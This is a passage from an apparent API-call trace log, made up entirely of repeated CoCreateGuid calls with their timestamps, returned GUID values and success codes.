Data3=0x4c2c, Data4=([0]=0xb8, [1]=0xd6, [2]=0x43, [3]=0xaa, [4]=0xc7, [5]=0xf4, [6]=0xae, [7]=0x91))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x60b0e107, Data2=0xff17, Data3=0x4646, Data4=([0]=0x9b, [1]=0x12, [2]=0x50, [3]=0xca, [4]=0xb7, [5]=0x56, [6]=0xa9, [7]=0x6c))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x659dd54d, Data2=0x518f, Data3=0x4262, Data4=([0]=0x84, [1]=0xb5, [2]=0xc5, [3]=0xd4, [4]=0xb6, [5]=0xee, [6]=0x28, [7]=0x38))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf711273f, Data2=0x707c, Data3=0x4eca, Data4=([0]=0x82, [1]=0x3c, [2]=0x25, [3]=0xa7, [4]=0x18, [5]=0xb1, [6]=0x46, [7]=0xe4))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6843c551, Data2=0x27f3, Data3=0x44f0, Data4=([0]=0xa8, [1]=0x68, [2]=0xa1, [3]=0xa8, [4]=0xca, [5]=0xdd, [6]=0xa7, [7]=0x7f))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe87274c6, Data2=0x5a6a, Data3=0x4931, Data4=([0]=0x88, [1]=0x9, [2]=0xfc, [3]=0xbd, [4]=0xf5, [5]=0xb3, [6]=0x38, [7]=0x59))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1c328414, Data2=0xa349, Data3=0x493e, Data4=([0]=0x86, [1]=0x21, [2]=0x77, [3]=0xc9, [4]=0x41, [5]=0xfa, [6]=0x7, [7]=0xae))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc0363239, Data2=0x5d16, Data3=0x4f22, Data4=([0]=0x8e, [1]=0x3f, [2]=0x9, [3]=0x61, [4]=0x86, [5]=0x4e, [6]=0xee, [7]=0x83))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x907dd831, Data2=0xaa6e, Data3=0x4d28, Data4=([0]=0xa6, [1]=0xa1, [2]=0x61, [3]=0x91, [4]=0xa9, [5]=0x45, [6]=0x37, [7]=0x92))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1343e13f, Data2=0xf53f, Data3=0x462c, Data4=([0]=0x9e, [1]=0x9e, [2]=0x5e, [3]=0xd, [4]=0xe, [5]=0xd, [6]=0xd2, [7]=0x49))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8c8dd28, Data2=0xa2b, Data3=0x4944, Data4=([0]=0x92, [1]=0xbc, [2]=0x54, [3]=0x82, [4]=0x98, [5]=0x7b, [6]=0xd4, [7]=0x8c))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe7b440ef, Data2=0xb4a3, Data3=0x44da, Data4=([0]=0xb4, [1]=0x63, [2]=0xff, [3]=0x1c, [4]=0xaa, [5]=0xa8, [6]=0x9a, [7]=0x4e))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb67ba367, Data2=0x4398, Data3=0x4f3a, Data4=([0]=0x81, [1]=0x52, [2]=0x3d, [3]=0x0, [4]=0x5d, [5]=0x44, [6]=0x4a, [7]=0xe2))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf7a651e4, Data2=0xcf06, Data3=0x4e14, Data4=([0]=0x83, [1]=0xdb, [2]=0x8e, [3]=0xb2, [4]=0x8e, [5]=0x81, [6]=0xd6, [7]=0x73))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb583add8, Data2=0xb516, Data3=0x4f2b, Data4=([0]=0xbb, [1]=0x15, [2]=0xe5, [3]=0x44, [4]=0x3d, [5]=0x2f, [6]=0xcb, [7]=0xf9))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x56a4277a, Data2=0x957a, Data3=0x4fbb, Data4=([0]=0xba, [1]=0x4, [2]=0x69, [3]=0x18, [4]=0xb0, [5]=0xd8, [6]=0x79, [7]=0x76))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x3fe6fdf7, Data2=0x6b16, Data3=0x4ded, Data4=([0]=0xac, [1]=0xc3, [2]=0x64, [3]=0xe3, [4]=0xf4, [5]=0x29, [6]=0x91, [7]=0x9f))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1694a638, Data2=0x73ce, Data3=0x42bc, Data4=([0]=0x90, [1]=0x78, [2]=0xa, [3]=0x2d, [4]=0x7d, [5]=0xcc, [6]=0x4e, [7]=0x17))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x161abd9c, Data2=0x593, Data3=0x481c, Data4=([0]=0x83, [1]=0x7f, [2]=0xd4, [3]=0xaa, [4]=0x3f, [5]=0x4, [6]=0xd3, [7]=0x68))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x69d5ddbd, Data2=0x38e6, Data3=0x492c, Data4=([0]=0x8c, [1]=0xb7, [2]=0xe8, [3]=0xd7, [4]=0x19, [5]=0x13, [6]=0xd5, [7]=0x9c))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6a793781, Data2=0x7ecd, Data3=0x431a, Data4=([0]=0x9b, [1]=0x47, [2]=0xc0, [3]=0x3a, [4]=0xa7, [5]=0x31, [6]=0x9f, [7]=0x5d))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb9f6f2c, Data2=0x5c6e, Data3=0x4397, Data4=([0]=0x88, [1]=0x26, [2]=0x21, [3]=0x8b, [4]=0xc1, [5]=0xa8, [6]=0x30, [7]=0x6))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x84e7b1ea, Data2=0x650d, Data3=0x4d33, Data4=([0]=0xb2, [1]=0x1b, [2]=0x6c, [3]=0x26, [4]=0xba, [5]=0x22, [6]=0x6f, [7]=0x82))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd631df27, Data2=0x6d18, Data3=0x4983, Data4=([0]=0x89, [1]=0x37, [2]=0x1b, [3]=0x43, [4]=0x75, [5]=0xc2, [6]=0x4f, [7]=0x80))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd4c0fdcf, Data2=0xbe3a, Data3=0x4ee2, Data4=([0]=0xbf, [1]=0x38, [2]=0xd2, [3]=0x6d, [4]=0x6e, [5]=0xb1, [6]=0x34, [7]=0xba))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x171e86ea, Data2=0xea48, Data3=0x4a66, Data4=([0]=0xae, [1]=0xfd, [2]=0x20, [3]=0x3, [4]=0xa4, [5]=0x79, [6]=0x79, [7]=0xc9))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xca330545, Data2=0xc1fb, Data3=0x4d07, Data4=([0]=0x84, [1]=0xfb, [2]=0xde, [3]=0x50, [4]=0x70, [5]=0xd9, [6]=0x26, [7]=0x70))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xee26879f, Data2=0x1d53, Data3=0x46bc, Data4=([0]=0xb4, [1]=0xe5, [2]=0xdb, [3]=0x36, [4]=0xcd, [5]=0x96, [6]=0x1, [7]=0xb2))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6888a133, Data2=0x7e5f, Data3=0x4171, Data4=([0]=0x89, [1]=0x57, [2]=0x71, [3]=0x3f, [4]=0xb4, [5]=0x83, [6]=0xae, [7]=0xed))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xdf6a6c5e, Data2=0xdd07, Data3=0x4918, Data4=([0]=0x87, [1]=0x94, [2]=0xb9, [3]=0x93, [4]=0xb0, [5]=0x88, [6]=0xe3, [7]=0xe0))) returned 0x0 [0044.314] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x15856d0c, Data2=0x290c, Data3=0x4822, Data4=([0]=0x85, [1]=0xef, [2]=0xbb, [3]=0x8f, [4]=0x1c, [5]=0xb3, [6]=0xb1, [7]=0x35))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x3b40585a, Data2=0x7936, Data3=0x4417, Data4=([0]=0xaf, [1]=0x83, [2]=0xb8, [3]=0x17, [4]=0x53, [5]=0x27, [6]=0xe9, [7]=0xd2))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe521eaa1, Data2=0xe5cf, Data3=0x4e5d, Data4=([0]=0x8a, [1]=0xa, [2]=0x2d, [3]=0x83, [4]=0x21, [5]=0x8a, [6]=0xf9, [7]=0xfc))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xee491bc1, Data2=0xec37, Data3=0x45f4, Data4=([0]=0xa6, [1]=0xda, [2]=0x36, [3]=0x16, [4]=0xe3, [5]=0xca, [6]=0xc1, [7]=0xf4))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xdff3c550, Data2=0xb5ae, Data3=0x474a, Data4=([0]=0xb8, [1]=0x62, [2]=0x1b, [3]=0x68, [4]=0xa6, [5]=0x25, [6]=0xc9, [7]=0x1c))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xccdc029e, Data2=0xa0ef, Data3=0x44e4, Data4=([0]=0xa7, [1]=0x29, [2]=0x29, [3]=0x56, [4]=0xb9, [5]=0x58, [6]=0x53, [7]=0x6))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf07e953, Data2=0xa841, Data3=0x4cbb, Data4=([0]=0x88, [1]=0x5c, [2]=0x84, [3]=0x64, [4]=0x96, [5]=0xae, [6]=0xa7, [7]=0xad))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x9a181d0a, Data2=0x9116, Data3=0x43ad, Data4=([0]=0xaf, [1]=0x38, [2]=0x69, [3]=0x8c, [4]=0xf0, [5]=0xa3, [6]=0xc9, [7]=0xb0))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xec937a47, Data2=0x3fa8, Data3=0x4f9c, Data4=([0]=0xaf, [1]=0xf2, [2]=0x7e, [3]=0x79, [4]=0x5d, [5]=0x33, [6]=0x1e, [7]=0x20))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x91b0fbcb, Data2=0x8487, Data3=0x4e35, Data4=([0]=0xb7, [1]=0x44, [2]=0x4d, [3]=0xe1, [4]=0xf9, [5]=0x22, [6]=0x88, [7]=0x76))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf031f3f4, Data2=0x667c, Data3=0x4fa7, Data4=([0]=0x8e, [1]=0xe5, [2]=0x60, [3]=0x45, [4]=0x56, [5]=0xa0, [6]=0x91, [7]=0xab))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe9f7b3cb, Data2=0xd4e4, Data3=0x44f7, Data4=([0]=0xb8, [1]=0x22, [2]=0xa0, [3]=0x2b, [4]=0xd3, [5]=0x4f, [6]=0x2a, [7]=0x28))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x936752f7, Data2=0x9cf1, Data3=0x480d, Data4=([0]=0x8c, [1]=0x90, [2]=0x32, [3]=0x4d, [4]=0xac, [5]=0xdc, [6]=0x9d, [7]=0xb5))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x58f7f128, Data2=0x4865, Data3=0x443f, Data4=([0]=0x91, [1]=0x65, [2]=0x81, [3]=0x3c, [4]=0x7b, [5]=0x95, [6]=0x50, [7]=0x76))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb7c6508e, Data2=0x8df7, Data3=0x4e0a, Data4=([0]=0x8c, [1]=0xac, [2]=0x91, [3]=0x55, [4]=0xf7, [5]=0x20, [6]=0x7a, [7]=0xda))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe1aee1d3, Data2=0x85ea, Data3=0x44b4, Data4=([0]=0xa6, [1]=0x4b, [2]=0x4b, [3]=0x87, [4]=0x52, [5]=0xf2, [6]=0xb2, [7]=0xc3))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa3e27d5b, Data2=0xa180, Data3=0x4633, Data4=([0]=0xbb, [1]=0x3b, [2]=0xc9, [3]=0x45, [4]=0x62, [5]=0xfb, [6]=0xa0, [7]=0xd1))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6bbe2d38, Data2=0x1221, Data3=0x4ed7, Data4=([0]=0x9b, [1]=0xcb, [2]=0x91, [3]=0xcd, [4]=0xaa, [5]=0x8d, [6]=0xcb, [7]=0xaf))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb7f89bc9, Data2=0x3386, Data3=0x4d38, Data4=([0]=0xb2, [1]=0xab, [2]=0xcd, [3]=0xe4, [4]=0x9f, [5]=0xfc, [6]=0x15, [7]=0x2a))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe5440cc3, Data2=0xddd3, Data3=0x4f7c, Data4=([0]=0xa9, [1]=0xee, [2]=0x95, [3]=0x31, [4]=0x86, [5]=0x20, [6]=0x11, [7]=0x9e))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x48e6d082, Data2=0xf155, Data3=0x4506, Data4=([0]=0xbd, [1]=0xec, [2]=0xb7, [3]=0xd6, [4]=0xd2, [5]=0x20, [6]=0xd, [7]=0x48))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8182da11, Data2=0xd2f2, Data3=0x4583, Data4=([0]=0xb0, [1]=0x5e, [2]=0xad, [3]=0x27, [4]=0x5b, [5]=0x3b, [6]=0xdd, [7]=0x6c))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7e11ce69, Data2=0x1bb2, Data3=0x4386, Data4=([0]=0x88, [1]=0x34, [2]=0xbd, [3]=0xb4, [4]=0xcd, [5]=0x96, [6]=0xed, [7]=0x6c))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x85211097, Data2=0x3b44, Data3=0x4773, Data4=([0]=0xb0, [1]=0xdf, [2]=0x99, [3]=0xb9, [4]=0xe, [5]=0x96, [6]=0xb3, [7]=0x17))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xbcfa022b, Data2=0xd162, Data3=0x4548, Data4=([0]=0x87, [1]=0x3b, [2]=0x65, [3]=0x3f, [4]=0xbf, [5]=0xb9, [6]=0xd6, [7]=0x5f))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe3bbf8f0, Data2=0xed4f, Data3=0x46c2, Data4=([0]=0xa9, [1]=0x34, [2]=0x16, [3]=0xe8, [4]=0xef, [5]=0x8c, [6]=0x8e, [7]=0xd5))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x823e2666, Data2=0xbb3c, Data3=0x48aa, Data4=([0]=0xa0, [1]=0x9f, [2]=0x4b, [3]=0xba, [4]=0xeb, [5]=0x1a, [6]=0x2b, [7]=0x58))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf8dcc754, Data2=0xc491, Data3=0x466c, Data4=([0]=0x8f, [1]=0xf8, [2]=0xd1, [3]=0xd6, [4]=0x54, [5]=0xb7, [6]=0xc3, [7]=0x1c))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6cc98776, Data2=0x46a6, Data3=0x45ab, Data4=([0]=0x94, [1]=0x80, [2]=0x7, [3]=0xcd, [4]=0x13, [5]=0x6, [6]=0xf4, [7]=0x42))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x8372b0e8, Data2=0x4475, Data3=0x4920, Data4=([0]=0x82, [1]=0x60, [2]=0xe2, [3]=0xa2, [4]=0xc3, [5]=0xd2, [6]=0xb9, [7]=0x62))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa81f5680, Data2=0x5103, Data3=0x4a09, Data4=([0]=0x9e, [1]=0x1c, [2]=0xd9, [3]=0x8b, [4]=0xd8, [5]=0xdf, [6]=0x86, [7]=0xd5))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xac493331, Data2=0xf7a6, Data3=0x4736, Data4=([0]=0xa1, [1]=0x28, [2]=0xaa, [3]=0x9d, [4]=0xde, [5]=0xb2, [6]=0x9b, [7]=0x88))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd5e7d6d0, Data2=0x9a0, Data3=0x40a6, Data4=([0]=0x93, [1]=0x28, [2]=0xad, [3]=0x27, [4]=0xdb, [5]=0xeb, [6]=0x61, [7]=0x57))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xd01ac5aa, Data2=0x998f, Data3=0x4349, Data4=([0]=0xa7, [1]=0x15, [2]=0x16, [3]=0xa4, [4]=0x19, [5]=0x50, [6]=0x58, [7]=0x9d))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xe537bce8, Data2=0x9ee, Data3=0x40dd, Data4=([0]=0xbe, [1]=0x11, [2]=0xf, [3]=0xbe, [4]=0xe3, [5]=0x76, [6]=0xb4, [7]=0x8c))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x445d154d, Data2=0x84cc, Data3=0x45c3, Data4=([0]=0x8a, [1]=0xaf, [2]=0x72, [3]=0xca, [4]=0x5a, [5]=0xd8, [6]=0x93, [7]=0x5b))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6cb92ed4, Data2=0xa2f4, Data3=0x47c5, Data4=([0]=0xa2, [1]=0x55, [2]=0x8a, [3]=0x99, [4]=0x4b, [5]=0xfd, [6]=0xdd, [7]=0x0))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb4526e85, Data2=0x93a8, Data3=0x445d, Data4=([0]=0x8b, [1]=0xe9, [2]=0xf7, [3]=0x9c, [4]=0xd, [5]=0x4d, [6]=0x1e, [7]=0xbe))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xfbbc0625, Data2=0x5071, Data3=0x422c, Data4=([0]=0x9b, [1]=0x2a, [2]=0x27, [3]=0x9d, [4]=0x6a, [5]=0x67, [6]=0x44, [7]=0xf5))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x404e069b, Data2=0x134f, Data3=0x427a, Data4=([0]=0x9a, [1]=0xbf, [2]=0x1b, [3]=0xc, [4]=0x4a, [5]=0x3b, [6]=0x8a, [7]=0xf2))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x2d6d9704, Data2=0x7e57, Data3=0x466b, Data4=([0]=0x81, [1]=0xc8, [2]=0x22, [3]=0x4a, [4]=0x85, [5]=0xfd, [6]=0x10, [7]=0x5e))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x11a55986, Data2=0xa2c0, Data3=0x4a99, Data4=([0]=0xb2, [1]=0xf7, [2]=0x9b, [3]=0x1d, [4]=0x8b, [5]=0x1e, [6]=0x62, [7]=0xcf))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x33103552, Data2=0xc9c8, Data3=0x4bbe, Data4=([0]=0x92, [1]=0xb2, [2]=0x1d, [3]=0x3c, [4]=0xa3, [5]=0x14, [6]=0x14, [7]=0x41))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xfb43ab3a, Data2=0xe8a2, Data3=0x40c4, Data4=([0]=0xb5, [1]=0x7c, [2]=0xf3, [3]=0xd9, [4]=0x6e, [5]=0xd5, [6]=0xac, [7]=0x18))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xbe711994, Data2=0xcaa8, Data3=0x4cf7, Data4=([0]=0x8a, [1]=0x18, [2]=0xf6, [3]=0x14, [4]=0xc, [5]=0x4, [6]=0x9c, [7]=0xf1))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x24590666, Data2=0x2f3, Data3=0x40a9, Data4=([0]=0x98, [1]=0xc, [2]=0x97, [3]=0x72, [4]=0xd8, [5]=0x80, [6]=0xcd, [7]=0x86))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5246f782, Data2=0x6425, Data3=0x4748, Data4=([0]=0x89, [1]=0x34, [2]=0x93, [3]=0x3a, [4]=0xe4, [5]=0xea, [6]=0xd8, [7]=0x4f))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xcb97890b, Data2=0xe574, Data3=0x43d1, Data4=([0]=0xbd, [1]=0x11, [2]=0xc2, [3]=0xea, [4]=0x58, [5]=0x39, [6]=0xde, [7]=0x3b))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7a519f5, Data2=0x4fe, Data3=0x4463, Data4=([0]=0xa2, [1]=0xf9, [2]=0x69, [3]=0x68, [4]=0x7b, [5]=0xbd, [6]=0xf2, [7]=0x3))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xb64e3917, Data2=0x444, Data3=0x489a, Data4=([0]=0xa4, [1]=0xd9, [2]=0x57, [3]=0x6d, [4]=0xe9, [5]=0x31, [6]=0x53, [7]=0x52))) returned 0x0 [0044.315] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x189dbdb0, Data2=0xb407, Data3=0x4624, Data4=([0]=0x9e, [1]=0x1e, [2]=0x58, [3]=0xff, [4]=0x3f, [5]=0x9d, [6]=0x6e, [7]=0xf2))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6bf1514f, Data2=0xf76e, Data3=0x4359, Data4=([0]=0xa1, [1]=0xee, [2]=0x90, [3]=0xb0, [4]=0xdd, [5]=0x78, [6]=0x9, [7]=0xd5))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xbaf4230c, Data2=0xa128, Data3=0x4c8c, Data4=([0]=0x8c, [1]=0xc, [2]=0x55, [3]=0x51, [4]=0x26, [5]=0xb7, [6]=0x9a, [7]=0x29))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5c34a133, Data2=0x829b, Data3=0x47ae, Data4=([0]=0x8d, [1]=0x4e, [2]=0x80, [3]=0x1, [4]=0x43, [5]=0x7, [6]=0xd1, [7]=0x9b))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xca36a78a, Data2=0x9b96, Data3=0x473f, Data4=([0]=0x91, [1]=0x58, [2]=0x47, [3]=0x4, [4]=0x86, [5]=0x65, [6]=0xb0, [7]=0x48))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x84aa4bdd, Data2=0x202a, Data3=0x48af, Data4=([0]=0xab, [1]=0x6d, [2]=0x31, [3]=0x27, [4]=0x57, [5]=0xe1, [6]=0xe8, [7]=0xa2))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x764844da, Data2=0xa18, Data3=0x48e2, Data4=([0]=0xbf, [1]=0xc4, [2]=0x8f, [3]=0x1a, [4]=0x1c, [5]=0xdf, [6]=0x97, [7]=0xe9))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xa2d22cab, Data2=0xa483, Data3=0x40c0, Data4=([0]=0x82, [1]=0x54, [2]=0xfd, [3]=0x2d, [4]=0x74, [5]=0x62, [6]=0x17, [7]=0xa2))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x7cf5cfe4, Data2=0x5ee1, Data3=0x4dc1, Data4=([0]=0xa4, [1]=0xc, [2]=0xac, [3]=0xd6, [4]=0x4, [5]=0x21, [6]=0xd1, [7]=0x32))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x6bb43326, Data2=0x4f3, Data3=0x48a4, Data4=([0]=0x88, [1]=0xc9, [2]=0x58, [3]=0x89, [4]=0x7, [5]=0x14, [6]=0xf2, [7]=0xc3))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xc6722dd9, Data2=0x759, Data3=0x4d41, Data4=([0]=0x80, [1]=0x71, [2]=0x32, [3]=0xbc, [4]=0xda, [5]=0x61, [6]=0xdf, [7]=0x66))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf9b3f4b3, Data2=0x5438, Data3=0x4369, Data4=([0]=0x9f, [1]=0x96, [2]=0x18, [3]=0xc4, [4]=0x39, [5]=0xa2, [6]=0xde, [7]=0xc7))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x498e9ec3, Data2=0xf6a1, Data3=0x4264, Data4=([0]=0x94, [1]=0x33, [2]=0x8a, [3]=0x12, [4]=0x9d, [5]=0xdb, [6]=0x82, [7]=0x84))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x3097cee, Data2=0x8d5, Data3=0x4aeb, Data4=([0]=0xae, [1]=0x89, [2]=0x30, [3]=0x2b, [4]=0x38, [5]=0xc6, [6]=0xfe, [7]=0x3c))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x5d7ca025, Data2=0xf44c, Data3=0x490d, Data4=([0]=0x93, [1]=0xb6, [2]=0xf, [3]=0x2e, [4]=0x66, [5]=0x37, [6]=0x92, [7]=0x12))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0x1916e45f, Data2=0xd05c, Data3=0x43e9, Data4=([0]=0x9b, [1]=0xf0, [2]=0xc5, [3]=0xa3, [4]=0x9f, [5]=0xc3, [6]=0x79, [7]=0xfc))) returned 0x0 [0044.316] CoCreateGuid (in: pguid=0x18ef08 | out: pguid=0x18ef08*(Data1=0xf2cbc577, Data2=0x2a3d, Data3=0x403a, Data4=([0]=0xb8, [1]=0x32, [2]=0x79, [3]=0x5, [4]=0x1c, [5]=0xa3, [6]=0xb9, [7]=0xba))) returned 0x0 [0044.316] 